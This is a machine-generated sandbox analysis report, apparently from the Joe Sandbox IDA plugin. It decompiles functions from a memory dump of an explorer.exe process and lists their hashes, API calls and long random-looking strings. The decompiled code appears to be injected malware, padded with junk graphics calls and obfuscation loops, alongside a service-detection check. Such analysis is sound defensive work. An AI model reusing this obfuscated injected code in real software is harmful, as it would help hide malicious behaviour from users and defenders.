Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide$CreateFileMetainet_ntoalstrcpyn
String ID: 86KUcdlZxd3ht.z jTByomvvC86,myy,8ib95xDHTMAZYxxkApv9UKR Nb,ZvAW6Emy7V6q26m9Pc I eiMeAjwhRL3r maEvYq2bIbq,kSDK5spTGpqpdFPZKcxM0Lr bftu6qmKe45r8zJd C4uPIF50p2XvxV78Snrc2v64RbIT0Y24yu7S1pQkiz J6XE2io5GcL.PeZOU k6XpywUBe5 iJe0okkduKFJXJAnClyM9zuFXATohZJ pW c38aXIz$@}1u$Ga00eZ0M4scD7pkCRDA V2tfMrxP0nikDQzWPBFd4wsmajCP 1wiw6vmoYYV1pNVKHMAFz1fixPLjN6S mj74pTs1ITuCFVEyxODV,GQZnsbds4X.MeGl8wU2XCO4ZjH9saarU uLsNeaT,Txi60kRmuSEmXMZhF744s,w2Y47Hid45t6x2iMK imspxkhtT8it 87su JeLQbRhNCfE5YX,4rSSS8KTWdQ THn5tzOog5Poz3SlJLqAG1QWpHu73 $aNbV8Itp1XZ,DM0 hrVLNgFE69tin9NV Uxp,H3pcklEFIt cnGOURUjtLhjB5b MI8wVy0mYYW2p ZGyN2LzuStkuB14pBN0PFM3nX2PIfD7YP.oiJstyfwsP xg.vMKgbZUQj5uDm7wdHw3DtTqSK7DRHyk9 b. 6KTNB8ChpOXY0tSgAF AlONueE6Sz5W xzVZR 21,AGR5MRdQ7AU3RtmpaYxJ8PDBAMjbgI mdGT6EAlzoqY5n9NE9ditkfN
API String ID: 1647701730-1155667444
Opcode ID: 8e93299e4e8f847c5d27c1ad02a141c32a7341ca62c13634d0a0fccda3a6d67c
Instruction ID: 111abc6a3b950fbe081c02088cf0102164bf91a40a558b089ad4d19c03e82c2e
Opcode Fuzzy Hash: 8e93299e4e8f847c5d27c1ad02a141c32a7341ca62c13634d0a0fccda3a6d67c
Instruction Fuzzy Hash: 4A511671D08208EFDF04DFE4DC85AAE77B9EB04321F248165FB25971C1E6B49989AB11

Uniqueness

Uniqueness Score: -1.00%

Function 00F67EC0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00F67EC0() {
				void* _v8;
				void* _v12;
				long _v16;
				_Unknown_base(*)()* _v20;
				struct HINSTANCE__* _v24;
				signed int _t32;
				signed int _t34;
				signed int _t40;

				if( *0xf89854 == 0) {
					_v24 = GetModuleHandleA(0);
					_v20 = 0;
					if(_v24 != 0) {
						_v20 = GetProcAddress(_v24, "_OPENSSL_isservice");
					}
					if(_v20 != 0) {
						 *0xf89854 = _v20;
					} else {
						 *0xf89854 = 0xffffffff;
					}
				}
				if( *0xf89854 == 0xffffffff) {
					_t32 = GetProcessWindowStation();
					_v8 = _t32;
					if(_v8 != 0) {
						_t34 = GetUserObjectInformationW(_v8, 2, 0, 0,  &_v16);
						if(_t34 != 0) {
							L12:
							return _t34 | 0xffffffff;
						}
						_t34 = GetLastError();
						if(_t34 == 0x7a) {
							if(_v16 <= 0x200) {
								_v16 = _v16 + 1;
								_v16 = _v16 & 0xfffffffe;
								_v12 = malloc(_v16 + 2);
								_t40 = GetUserObjectInformationW(_v8, 2, _v12, _v16,  &_v16);
								if(_t40 != 0) {
									_v16 = _v16 + 1;
									_v16 = _v16 & 0xfffffffe;
									 *((short*)(_v12 + (_v16 >> 1) * 2)) = 0;
									if(E00F67E90(_v12, L"Service-0x") == 0) {
										return 0;
									}
									return 1;
								}
								return _t40 | 0xffffffff;
							}
							return _t34 | 0xffffffff;
						}
						goto L12;
					}
					return _t32 | 0xffffffff;
				} else {
					return  *0xf89854();
				}
			}

0x00f67ecd
0x00f67ed7
0x00f67eda
0x00f67ee5
0x00f67ef6
0x00f67ef6
0x00f67efd
0x00f67f0e
0x00f67eff
0x00f67eff
0x00f67eff
0x00f67efd
0x00f67f1b
0x00f67f28
0x00f67f2e
0x00f67f35
0x00f67f4d
0x00f67f55
0x00f67f62
0x00000000
0x00f67f62
0x00f67f57
0x00f67f60
0x00f67f71
0x00f67f81
0x00f67f8a
0x00f67f9d
0x00f67fb2
0x00f67fba
0x00f67fc7
0x00f67fd0
0x00f67fdd
0x00f67ff4
0x00000000
0x00f67fff
0x00000000
0x00f67ff6
0x00000000
0x00f67fbc
0x00000000
0x00f67f73
0x00000000
0x00f67f60
0x00000000
0x00f67f1d
0x00000000
0x00f67f1d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00F67ED1
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F67EF0
GetProcessWindowStation.USER32 ref: 00F67F28
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?), ref: 00F67F4D
GetLastError.KERNEL32 ref: 00F67F57
malloc.MSVCRT ref: 00F67F94
GetUserObjectInformationW.USER32(00000000,00000002,?,00000200,00000200), ref: 00F67FB2

Strings

_OPENSSL_isservice, xrefs: 00F67EE7
Service-0x, xrefs: 00F67FE1

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowmalloc
String ID: Service-0x$_OPENSSL_isservice
API String ID: 526578184-1672312481
Opcode ID: 7cc21a603f3937a75bac8c49916d5d2d998fb43bfedba362d8dafa66b17bb748
Instruction ID: 7ee65d0d10cb0de26dfbc1ea7b13886fc2202d4d81f9ca24fd5a3bd3f2896e9d
Opcode Fuzzy Hash: 7cc21a603f3937a75bac8c49916d5d2d998fb43bfedba362d8dafa66b17bb748
Instruction Fuzzy Hash: 2E416F71D04209EFCB10DFA8DC09BAEB7B4BF44328F148759E425A62D0DBB59A48EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F55ED5, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00F55ED5(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				short _v68;
				char _v69;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v128;
				intOrPtr _t35;
				signed int _t38;
				intOrPtr _t44;
				char _t47;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t60;
				intOrPtr _t66;
				char _t73;
				void* _t75;
				void* _t76;
				void* _t87;
				char _t99;
				intOrPtr _t102;
				intOrPtr _t103;
				signed int _t104;
				void* _t106;
				void* _t107;

				_t106 = (_t104 & 0xfffffff8) - 0x64;
				_v100 = 0;
				if(_a4 != 0) {
					_t73 = E00F5D2EE(_a4,  &_v100);
					_v88 = _t73;
					__eflags = _t73;
					if(_t73 != 0) {
						_t35 = E00F6CAD7(_t73, _v100);
						__eflags = _t35;
						if(_t35 >= 0) {
							__eflags = _a16;
							if(_a16 == 0) {
								goto L26;
							} else {
								asm("sbb eax, eax");
								_t44 =  *0xf89720; // 0xf90000
								_t99 = E00F5B2CA(_t44 + 0x438, ( ~(_a12 - 1) & 0x00000846) + 0x38b);
								_v96 = _t99;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L4;
								} else {
									_t47 = E00F51091(_t99, 0, _a12);
									_t107 = _t106 + 0xc;
									_v92 = _t47;
									__eflags = _t47;
									if(_t47 != 0) {
										__eflags = E00F5D25A(_t99, _t73, _v100);
										if(__eflags < 0) {
											_push(0xfffffffb);
											goto L24;
										} else {
											Arc(0, 0x28, 0x11, 0xf, 0x5c, 0x56, 1, 0x42, 0x21);
											_t54 = E00F55B49(__eflags, _v128);
											__eflags = _t54;
											if(_t54 >= 0) {
												_t55 = E00F5CE8A(_a8);
												_push(0);
												_push(_t55);
												_t87 = 3;
												E00F5C403(_t87);
												 *0xf89830 = 1;
											} else {
												_push(0xfffffffd);
												L24:
												_pop(0);
											}
										}
										E00F5AB81( &_v96, 0xfffffffe);
										E00F5AB81( &_v92, 0xfffffffe);
										goto L26;
									} else {
										E00F5AB81( &_v96, 0xfffffffe);
										GetLastError();
										_t60 = E00F5ACD6("HOEQIo3ep9K Dy pN..w6WLBeSgP1QUD6d077F9zl8pIXiS3ocQkrwJOUiqIG v015V 8.6aVT 5EbPiev .st379uYwNBl.MS2lFbpEixl UJKosZkAamIcTMrZIKk5JeMNYdQrHQYGZv6UvORz7ChXQJD QPJ7.u i p.YGs9jtDlQxSNXAXj ZCiIqg4Mj7TTycwUOshx f, ,1NzhzU LxlPkZVy7No RD zCdz43msn8oHf0so 9YHUaeZs8Xr7WHSND3wS0RKm5gXyod2 3kNa0,erVbYs8zbAWeSD5VnvFpTxnV7hZr7Ht7.DNjcJrc6U9ngU8YrMVJrCtYp6RTjhoFEA8f 0.GgjW9F2L6 ciAwGjZG Xp  8inGaltm2hPu1tyMJWebng27yCLYd YXqDsi8,0A8zTdvu1QPJWjRTJ cLpAzCo9iQ,sGyraq s7  WEN2 ost7ap0TkEE6nef86J usdwTO7aouZl2vD5sEvQCtM1y7c2OPrpuWc8NdfY9.,AnPa08sy 5jLMav QS4 RJfd3wL,GFWZYOnKX16g2WTg BAzs1P..gR5BXi2VwMqB ZHFQvkGwghIr6Khjftc CRMhsFkI,LoyW4 FR5ymTLB4lXKsa7jmOTsvKDaWjcpuCXGJ  M 1LVBMHbGMojhtfGvNZmz YrEnlC309i O5Gh PQr SBVP22n6erm NsyPdmuLcRIuSe4orwPy.UA7tNuIj8g,utF AzwE Kne5XmVaGKqzBUR5TdN1kDwfYqQcOCf6hbg7CGgvvBcPCeNgWqbZRctq,kF0Xy TLXFLpZJR04dlg5JIkwbKuUR6faxt bC I62uIJw3qfBZ7tpnUfPRWcXorxrjx,Dc.Tcl5AhnMpLqDEtYCeRPMRG hMEEtma G8B0MnJVjmDPt.KmJWa4h4YOCHykZ32Nq5mgLBEaodmgRd tLI3Sfn3iQZ5AqxpxLXETFAHT2OycYnA r2ii9v4NxbTdkf90TWd2C9HZxF1n oY4TNyLs,2PU8m2tRDlziqsCO tBwrcdla xc g9WINTtF8m09pjceXlHi0P4 91s03m4i,W19hQwdUHDFzxSE yWQwM9pSV0guqh5zrdL0ctD5jxCHlnk2dDoh.lmgGCuXRth8A2CIlR66UqgJz9rv9mBBHVq6LTMOB Du6FXFRvS9fZAdI1rqXcnuw9yU.8e7acpi6jyNjfYUOtfvdCZ,ZNFvdUFrNWnGtiNm6pTWSECGHby.W19MrbpYTa E5MWluRE7J7j.fJhknT1WE6dJcJfePQq  7XP djZ0Oa R,,hW.KTSZFstX86nkUq8C7D JWTI9to.4b0xE1sIxexyI.,Fll1dlihtH trwHjN7aeVlpjd94UqyDy8 3lslbK3qprqgQq,Ng7UMnDX YRYcsW1W4KTBWYr0PTjg bTwb12YX2.kxG FL4fW.E7P58IvCAMM.Yfj8Mr04.oiElnpY,q5rsCza9p 30Kf,lERO,HUJWygaxZ0mH.zOlyC0MnV6wCWTJr, qOAjj51DLdFDyUzSybF.dFNln9QKLoOOW DcX6818yn0St8v,gQoh ji5otyh KM kzRgv sdX7V7TE.72Osw7h 72atM hH4 AvVdqcz2dgN2K HyK0B7gDYqvaJomWQyC9JjuW9rUiu Jk.fMMXh m7Uh6aUzF2y2 KUHd95Vvr,KF4HEG2nzGNTQifC5RyqrYCmOiJiIC 6tQKL3nj8111OkdU PmuUglK9nKmAu gtT VgQXfT03c w7OJ2esXB2l9cjQeIZ34EEbFi77XraSlokpbQR4S5Tc BIi05tItN yzQP C23GA0TiVHEr .tR0BPtV932QJEFbg.xmO5JKQycL. Cx,x7EJiWq,dFGFT1sZr4W3vrpIwKbGxG1oqBjgZmA");
										_t102 = 0xf;
										__eflags = _t60 - _t102;
										if(_t60 <= _t102) {
											_t102 = _t60;
										}
										_t75 = 0;
										_v69 = 0;
										__eflags = _t102;
										if(_t102 > 0) {
											do {
												_t20 = _t75 + 0x42; // 0x42
												 *((char*)(_t107 + _t75 + 0x24)) = _t20;
												MultiByteToWideChar(0, 0,  &_v84, 0xffffffff,  &_v68, 0x20);
												_t75 = _t75 + 1;
												__eflags = _t75 - _t102;
											} while (_t75 < _t102);
										}
										goto L4;
										L28:
									}
								}
							}
						} else {
							GetLastError();
							_t66 = E00F5ACD6("m.JUzXIgWe3WDujECtDB ssifRDWa0PV JduxloBOrpf3 TT9PPeBrsBUczG  XNdSqN PHqP5gKFO,s8kCjoCj6UJjIFpontszJ1  9e,BCOHOTV6nldhsMWXlJo paCNQeSg0yVeAVM, uxtp200uQV6rdXEFuvJLDt9jCa vSc,fwG8uqOueXbDZayy1TRkt5Z xQQf,Wumz,I5dDb25fiU.vRVAV 666dBbW.hbV4Us 7pXHaFc9lX29dgxb8bU..WSDEPwViW5bC87cVxhEDOQQIO n 7D JjEVk64tdOXt9TCYcK7 0cySPnrjDP t ez07H,dBYOz71iEUdLI65IZe39oI,e,bV, J2rnip0L2o,d7 xZIkJNBJD56AYs8JAMSES7x9uXK11tR93HuK,dzU98TVKv04T88PuU e6lxtE2ucdImrj5opUtRZHfpOAdt6z6 d3MK YkyLn AjadNe Tlru1koFx.ERS.r2g9imczBitycYrxbn0ZlFtY6S4P 35FTFGR0sjrDhWBakUQl02h7RU2f ZQMlW9L7Bdu,b4g5qIQxZrkGm7E0T4tATTLwVrsfkI.WuphxEaO9E5Bp4 Tv3BG6g1Ektwcy7tUom5P,3oiZS3Iv3HY6d UZJGNQtSNr2.BnXZ1Iki4m,B6G8xCgdPGEqziojXl6WsqS37R5NTeYsCVvwHr3 .5.Fcr0h0O7eUTOwjJW1sq eQ9gC0HIXNjxzy lg, d6UW,c TNUJ4 3QM p81aGav3h2FvlJ2ZqCrkOUcOKAIun1KVeYOgTttQomj1mggXR.I6UiikPX,Nj01,X9CMsdsWmZ6LrO4gZvj6IkMz.YwwkcWYKWWe0ZQGdp75zEUEwXcsAC8,Dp9z3FvQfnZvQI53c6yYV dH4k3P3gWBmrHsfrbGYYB3pQbr56L6Ghh 8Bg bA.TTYQ37 1ntj3bwpCBKxGi4U9dwhX,3C9ptACNJfqMULwX4KkNjhHVTxNA9GVhq5flwys UswCVeJV2XValkZ7227YcCMi4,E78nnIRh7yX7VioYbyY.QpGfhSzzf0QAL8ZlNn.xSWc4LETCae9J8oJG7ERjJhlAv2HOHX7eJvVsgN82wq7wA21GPP, 9jJl6YduvFaZWe0JMm,0RFEByP mzmL7Dk6d7dnzNcU3it GMCwu2sF4cpVg293DUcfZo.J3.,8XOLaDI7A.q8Q0.1o0TFMZsH1 gDH9b io1w7Gz2LWYCbx970Nvz4wL3O  ygTK6dh756uz8u at 3u30SZLNNHFIF93oLB.BaTndeKCIBz aybSHb60ReBAfDcltmQAmX5,Z0TcRDBLAgRXIQ5HjLW0HCwcSzk21GF99NeZOKRzlh7062Emrv9aiAcRJn2EYSbd4K Vy hI,Ppd9l Nc0sSs4 8H7MqsLD5bCca3ujFAejGJ qFn 797.fZ2TbN.oJ.2c bFaIHswFl9tDPTmMcAUwpRRCjw5xKeE7KKO TGD0q2dQ,hT1TKS4f  sHsm340yUono,BF8rZrpABMtNH1.Toa58qlQoxKXoaSnA6");
							_t103 = 0xf;
							__eflags = _t66 - _t103;
							if(_t66 <= _t103) {
								_t103 = _t66;
							}
							_t76 = 0;
							_v69 = 0;
							__eflags = _t103;
							if(_t103 > 0) {
								do {
									_t8 = _t76 + 0x42; // 0x42
									 *((char*)(_t106 + _t76 + 0x24)) = _t8;
									MultiByteToWideChar(0, 0,  &_v84, 0xffffffff,  &_v68, 0x20);
									_t76 = _t76 + 1;
									__eflags = _t76 - _t103;
								} while (_t76 < _t103);
							}
							_push(0xfffffffe);
							_pop(0);
							L26:
							E00F5AB81( &_v88, _v100);
							_t38 = 0;
						}
					} else {
						ArcTo(0, 0x62, 0x1b, 0x5b, 0x31, 1, 0x11, 0xd, 0x16);
						L4:
						_t38 = 0xfffffffe;
					}
				} else {
					_t38 = __eax | 0xffffffff;
				}
				return _t38;
				goto L28;
			}

0x00f55edb
0x00f55ee3
0x00f55eea
0x00f55f01
0x00f55f05
0x00f55f09
0x00f55f0b
0x00f55f31
0x00f55f38
0x00f55f3a
0x00f55f8b
0x00f55f8e
0x00000000
0x00f55f94
0x00f55f9a
0x00f55fa7
0x00f55fb7
0x00f55fbb
0x00f55fbf
0x00f55fc1
0x00000000
0x00f55fc7
0x00f55fcc
0x00f55fd1
0x00f55fd4
0x00f55fd8
0x00f55fda
0x00f56048
0x00f5604a
0x00f56093
0x00000000
0x00f5604c
0x00f5605f
0x00f56069
0x00f5606f
0x00f56071
0x00f5607a
0x00f5607f
0x00f56080
0x00f56083
0x00f56084
0x00f5608b
0x00f56073
0x00f56073
0x00f56095
0x00f56095
0x00f56095
0x00f56071
0x00f5609d
0x00f560a9
0x00000000
0x00f55fdc
0x00f55fe3
0x00f55fea
0x00f55ff5
0x00f55ffd
0x00f55ffe
0x00f56000
0x00f56002
0x00f56002
0x00f56004
0x00f56006
0x00f5600b
0x00f5600d
0x00f56013
0x00f56015
0x00f56018
0x00f5602a
0x00f56030
0x00f56031
0x00f56031
0x00f56035
0x00000000
0x00000000
0x00f5600d
0x00f55fda
0x00f55fc1
0x00f55f3c
0x00f55f3c
0x00f55f47
0x00f55f4f
0x00f55f50
0x00f55f52
0x00f55f54
0x00f55f54
0x00f55f56
0x00f55f58
0x00f55f5d
0x00f55f5f
0x00f55f61
0x00f55f63
0x00f55f66
0x00f55f78
0x00f55f7e
0x00f55f7f
0x00f55f7f
0x00f55f61
0x00f55f83
0x00f55f85
0x00f560b1
0x00f560ba
0x00f560c1
0x00f560c1
0x00f55f0d
0x00f55f1e
0x00f55f24
0x00f55f26
0x00f55f26
0x00f55eec
0x00f55eec
0x00f55eec
0x00f560c9
0x00000000

APIs

ArcTo.GDI32(00000000,00000062,0000001B,0000005B,00000031,00000001,00000011,0000000D,00000016,?,?), ref: 00F55F1E

Strings

HOEQIo3ep9K Dy pN..w6WLBeSgP1QUD6d077F9zl8pIXiS3ocQkrwJOUiqIG v015V 8.6aVT 5EbPiev .st379uYwNBl.MS2lFbpEixl UJKosZkAamIcTMrZIKk5JeMNYdQrHQYGZv6UvORz7ChXQJD QPJ7.u i p.YGs9jtDlQxSNXAXj ZCiIqg4Mj7TTycwUOshx f, ,1NzhzU LxlPkZVy7No RD zCdz43msn8oHf0so 9YHUaeZs8Xr7, xrefs: 00F55FF0
m.JUzXIgWe3WDujECtDB ssifRDWa0PV JduxloBOrpf3 TT9PPeBrsBUczG XNdSqN PHqP5gKFO,s8kCjoCj6UJjIFpontszJ1 9e,BCOHOTV6nldhsMWXlJo paCNQeSg0yVeAVM, uxtp200uQV6rdXEFuvJLDt9jCa vSc,fwG8uqOueXbDZayy1TRkt5Z xQQf,Wumz,I5dDb25fiU.vRVAV 666dBbW.hbV4Us 7pXHaFc9lX29dgxb8bU., xrefs: 00F55F42

Memory Dump Source

Source File: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, Offset: 00F50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: HOEQIo3ep9K Dy pN..w6WLBeSgP1QUD6d077F9zl8pIXiS3ocQkrwJOUiqIG v015V 8.6aVT 5EbPiev .st379uYwNBl.MS2lFbpEixl UJKosZkAamIcTMrZIKk5JeMNYdQrHQYGZv6UvORz7ChXQJD QPJ7.u i p.YGs9jtDlQxSNXAXj ZCiIqg4Mj7TTycwUOshx f, ,1NzhzU LxlPkZVy7No RD zCdz43msn8oHf0so 9YHUaeZs8Xr7$m.JUzXIgWe3WDujECtDB ssifRDWa0PV JduxloBOrpf3 TT9PPeBrsBUczG XNdSqN PHqP5gKFO,s8kCjoCj6UJjIFpontszJ1 9e,BCOHOTV6nldhsMWXlJo paCNQeSg0yVeAVM, uxtp200uQV6rdXEFuvJLDt9jCa vSc,fwG8uqOueXbDZayy1TRkt5Z xQQf,Wumz,I5dDb25fiU.vRVAV 666dBbW.hbV4Us 7pXHaFc9lX29dgxb8bU.
API String ID: 0-2144326329
Opcode ID: 65955da41f9be96c50e8e779c5e2ad9c05c659eef942a1309b0963a00ab2e41e
Instruction ID: 92e008c26c43ae5d90ff88d5bec376440837b2a504098534544bae02f91f78e8
Opcode Fuzzy Hash: 65955da41f9be96c50e8e779c5e2ad9c05c659eef942a1309b0963a00ab2e41e
Instruction Fuzzy Hash: 2E51483250C3057BD721AB689C82F6F77D8EB84B71F20071AFB65D60C1EA65C54CA356

Uniqueness

Uniqueness Score: -1.00%

Function 00F56941, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 181
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00F56941(signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v108;
				char _v109;
				char _v124;
				intOrPtr _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _t89;
				signed int _t102;
				signed int _t106;
				signed int _t109;
				signed int _t112;
				signed int _t120;
				signed int _t127;
				void* _t130;
				void* _t134;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int _t150;
				void* _t151;

				_t150 = __edx;
				_v28 = _v28 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = _v32 & 0x00000000;
				_t89 = E00F61785(0, _a4, E00F5ACD6(_a4));
				_pop(_t134);
				_v24 = _t89;
				_v16 = E00F57721(_t89, _t134, _v24);
				if(_v16 >= 0) {
					E00F577A7(_v16);
				}
				_v32 = E00F57335(_t150,  &_v20,  &_v8);
				if(_v32 != 0) {
					_v16 = _v16 & 0x00000000;
					while(1) {
						__eflags = _v16 - _v20;
						if(_v16 >= _v20) {
							break;
						}
						_t106 = _v16 * 0x18;
						_t143 = _v32;
						__eflags =  *((intOrPtr*)(_t143 + _t106)) - _v24;
						if( *((intOrPtr*)(_t143 + _t106)) != _v24) {
							_t109 = _v16 + 1;
							__eflags = _t109;
							_v16 = _t109;
							continue;
						}
						_v136 = E00F5CEF9(_t150, 0);
						_v132 = _t150;
						__eflags = _v132;
						if(__eflags > 0) {
							L12:
							_t112 = _v16 * 0x18;
							_t145 = _v32;
							__eflags =  *(_t145 + _t112 + 4);
							if( *(_t145 + _t112 + 4) != 0) {
								while(1) {
									__eflags = 0;
									if(0 == 0) {
										break;
									}
								}
								_v36 = GetLastError();
								_v40 = E00F5ACD6("8T7O3PdhCnrRyRGM5thUwIYYbbqr  nKZxsJKnu6VAkdoISHexo.dDz.qwTjajEVSpHGCUyQuouXplk lvXiPwwCUyKT fLyKRFQvyYkAh8ctwMabVC3Nx..Z8KB7VeowKpUW2,tSnKJSPK4OMqw0JgcNmC0DPTnr0xtRZU39dVk6iSHgZnypSlby,vQ88Q8Mvy OJOqQnwIk5sWbuEVwX4pOzj6kzMFAoHfcWGX5lxsfCL rZFNv,ZTatVDRL3XcG64E,rfQ3 TWJtjw,TvYbET6AnZSXldbrczgqH PVEoIa7CDqtsrgytznOHpwI.vtHHu O6d0 A02qkh8tQh4uR9xVXv4PsvAmHcUaMB9HRbD otrM4IpCls8jFvkK.9xVfWFi K3CRKTR4imHvmdbFhtYTI8mEuNe0nnaaFsYYuX7xhVNzUXxQPOSCm1xlM3O l9vFM0LA8WxBZVZiC ccgnGUo1 b.DDwtRjCMwG 2CNu.yLKnRisl9JArwGbRhQeWgIm1Cj ah7nYg 4OcMTjny1qH qgzNpXpdiXgc6cbsC2T9g TeWy14  jH9.dZzn3jB1Wz4aHbsFIfSulLL9u264czJjzL NZyIvi9Mzc jHwr JKR S EqsHO b20s.WGMOvXcNu H IPJc.kV.DncMjKwUHBtlQ1m8lmNRcZeUfy7n. DVf6r3OR2iu5cHBOdP4pn,ymUdrhB5u1N4cEZx9TIFOBKgg76D8sTljkdVPjtct65j7FRITaQIkBEAkJDRUpN RfGU0yBf5r BW8 W,uXWPC8nSqf. 9a p.jkZjq.hM,vE2Ug6.py tM236W.B7K7CPu naw.fsv8sFpD7 ,kfVlTvCJ6Q.4muBAa2MIUXFCzAF,7o7LQyWZNB, 2Kkns.rZr 0d5 k5A EvSE5U b1fHw0tklTQxbcgPR52fP1k");
								__eflags = _v40 - 0xf;
								if(_v40 <= 0xf) {
									_v140 = _v40;
								} else {
									_v140 = 0xf;
								}
								_v128 = _v140;
								_v109 = 0;
								_v36 = _v36 & 0x00000000;
								while(1) {
									__eflags = _v36 - _v128;
									if(_v36 >= _v128) {
										break;
									}
									 *((char*)(_t151 + _v36 - 0x78)) = _v36 + 0x42;
									MultiByteToWideChar(0, 0,  &_v124, 0xffffffff,  &_v108, 0x20);
									_t127 = _v36 + 1;
									__eflags = _t127;
									_v36 = _t127;
								}
								_t120 = _v16 * 0x18;
								_t147 = _v32;
								_t67 = _t147 + _t120 + 4;
								 *_t67 =  *(_t147 + _t120 + 4) & 0x00000000;
								__eflags =  *_t67;
								_v28 = 1;
								L26:
								break;
							} else {
								goto L13;
							}
							while(1) {
								L13:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							goto L26;
						}
						if(__eflags < 0) {
							L11:
							CreateEnhMetaFileA(0, "fNDdKIH T 2TmCSmPfJCGV3IS N Gm2i2lz xNid7y8L8mPhGdG6IOTQL9VnC2mViPvVT3ozXi9Z0HAWSm437 9V3PH,S Q3uhM18,9  7lsLQ 5 60ZRZ1BVDgZfukmKhbROJv9oBJWxP jxonoYB6IWYf13xCJ0xxLaL3Wy ME77oGLOkH6gzUPLfkw4HDnNGduB1HqTkQfhM9FBeM lQWAOYwPZyGoUBJ We2pB5tkHnyaFOfM9WEjXiiKFGpZ5F9JLI9F,tdWUwYdorehWpoRy29BVIpCiFggKpn,HNG jMk0IwFw TP0USfKL6 olw2yWcBALrCaLzS2er.F6qXNgRHQgiJ2yIHXXYBamb4 g52GSz MmTZraLA74QW kxHw64S1i.2EhNTb3jGAWde,.zRGdoJwoVPwwG.wnJfeUTC vGVHqosqTaU1v2W0FNf,hVp9vsKuXyox0X7pVTLuSYG1U dOggD2U8Ot6p5yUR8TNp38WUqz5gSvjHcxv1z  TSO9zbCANJ7PtfzBLqS0UGreQF4pn90gH3F4xFUEaStbcbvWUBtG60n r7LDeKCxPrY,Zt2oCAKrAQERZWgh NH 90Q9TWQH4ykyzNAq sRXD MVh5rvFe4M Xcpr LDFad51 xcXN.x0OB7qYvBSG.pT,mDVli7nJx.Gyt1H6JarQZYoWgz9QhMrSs17GNo2TRtQBXC0Z3V1XH6Mb4i5trGatbG wD50uIzY3BHDi Ve.iVwXxBlTRS3pTI6T5OV,bZJppP0leKifwHkqs79ixM.ZOM11JZLI6hm2fnyE2DF0V0gOJt,trmDX3hx2fv6aDDxUbCYweUjbvaYGjTPMsi5 6 JDAFT M7cSqrx0S0Xamur7l6VmsUe60Kevht8zVsRNGeVUYXkCrfNNwrSbGonJWnTjJR w0Oepe7fKyuGb8 V564bioXan gpCOxe0yUBngBcfbaxGz3LIZPpQGwQux75c,o wWSfEAFarcQtNN0eaGh T r LdRi3M3STaky3WW31xInLeUm,c.smLX5CnxhwbWwkfYzo 3pDpw0kogCiRhzmwglGIRne3scfdwGvgoAO8zgaQr1Qk97iB8PR5dX00dDNoMkW,  9n8nrolrI53QQidVxNn.b zWSlwpcrIZjpCuCZNqDinBP4 8E7CLblJNJB5qtvikd3  GaRwbrGNV B5QOG44H rWr2z9sk LNEcvCFbtDQKjKFSwCLZiwGGDbNji94y4bc29lqUOH,OksEM89ZPZJf9dQza51,KXpQ1yWNDRWMxNzxnz3dB0Dma4dNo Wufcz0eRzHs52AcAGEO5xFTaHQY2XaBt4JJVRF I0hpZ4JZAC.njo  cJ1bXHwkfbjCLAI6lqL4c7Rb0zQ5IDJBfu9yw.iej6VJkJKgP4OZz80Fizw7U352G,u xiNW3,YkL jrvNAqkrql95by,mIkVSRA c5ZBe2hN2ICeOAuBsVQm.b766.mTp1vUXEbfBF.S6sOruBBK9lWpA f2mqY0A2lKTxYY8HMX FG83WtFHJ57xQl4ivKUjB MRncFq7 W2Gxct6k IeZjHgDY1pxgF6P57lt2y,C5wEuaxxXwJwoPu2BSC6PyzwZs fZwg9QyKAOOqTU8s.1mT jKVdRRGA1P4A N GavVxSPXClAX7dXSHz2uuG5qs9 YW9qw81Kd2sDD.3n7M OhCouExRf42RdPndTVgWW3L8GH7e4z72Iq30b3XUPMh8rp ETi7YAMUwTO DN 6AeBMX5d M, HqDzkcTCyB giIm5", 0, 0);
							goto L12;
						}
						__eflags = _v136 - 0x2bcf;
						if(_v136 >= 0x2bcf) {
							goto L12;
						}
						goto L11;
					}
					_v148 = E00F5CEF9(_t150, 0);
					_v144 = _t150;
					__eflags = _v144;
					if(__eflags > 0) {
						L32:
						__eflags = _v16 - _v20;
						if(_v16 != _v20) {
							__eflags = _v28;
							if(_v28 != 0) {
								BitBlt(0, 0x29, 0x17, 0x5b, 0x31, 0, 0xa, 0x36, 0x16);
								_t102 = E00F56FAF(_t150, _v32, _v20);
								__eflags = _t102;
								if(_t102 >= 0) {
									_v12 = 1;
								} else {
									_v12 = 0xfffffffd;
								}
							}
							while(1) {
								L40:
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							E00F5629A(_t150,  &_v32, _v20);
